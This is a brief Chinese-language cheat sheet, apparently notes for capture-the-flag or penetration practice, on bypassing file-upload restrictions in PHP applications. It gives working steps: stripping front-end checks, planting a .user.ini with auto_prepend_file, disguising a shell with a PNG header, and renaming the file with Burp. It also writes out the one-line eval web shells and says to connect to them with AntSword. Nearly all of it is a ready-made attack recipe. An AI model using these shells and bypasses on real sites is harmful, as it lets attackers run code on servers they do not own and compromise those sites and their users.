前端f12绕过:
f12 -> 删除部分参数
user.ini绕过:
上传 .user.ini
写入
auto_prepend_file=ym.png
上传 ym.png
一句话:
<?php @eval($_POST['caixukun']);?>
用蚁剑连接同目录下的php文件,密码为一句话木马
前端单单验证png文件:
上传ym.png
%PNG
<?php @eval($_POST['caixukun']);?>
burp抓包修改:
把 ym.png
修改为 ym.php
如果过滤了代码中的 php
那就用短标签:
<?=eval($_POST[1]);?>